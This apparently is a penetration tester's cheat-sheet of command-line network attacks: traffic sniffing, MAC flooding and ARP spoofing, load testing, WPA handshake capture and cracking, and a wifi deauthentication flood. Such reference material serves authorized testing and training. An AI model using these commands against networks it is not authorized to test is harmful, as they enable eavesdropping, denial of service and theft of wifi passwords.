Network Based

Sniffing

TCP Sniffing

# Basic output
tcpdump -i <interface>
# Verbose output
tcpdump -A -i <interface>
# redirect to pcap file
tcpdump -A -i <interface> -w /tmp/tcpdump.pcap

File transfer

Over SSH:

# SSH Local folder to remote
scp -r <local folder> <username>@<IP>:/<pathToFolder>

#SSH Remote folder to Local
scp -r <username>@<IP>:/<pathToFolder> .

Mac Flooding (DOS)

Dangerous. Easily detected by SOC. Can result in network device being blocked (hence potential DOS attack)

macof -i <interface>
# Does not work with Arp validation enabled
ettercap -T -i <interface> -M arp

Load Testing

# Non auth
siege -v -c 100 <url>

# Cookie Auth
siege -v -c 100 -H 'Cookie: name=value' <url>

Wifi Cracking

Guide: Geeks For Geeks

# List Interfaces
airmon-ng

# Stop Interface
airmon-ng stop <interface>

# Start Capture
airmon-ng start <Interface> <Channel>

# Collect Handshake
airodump-ng -c <Channel> --bssid <bssid> -w psk <interface>

# Crack Password
aircrack-ng -w wordlist psk*.cap

Wifi Deauth Flood DOS

airmon-ng start wlan0
mdk3 mon0 d -i <essid>

Last updated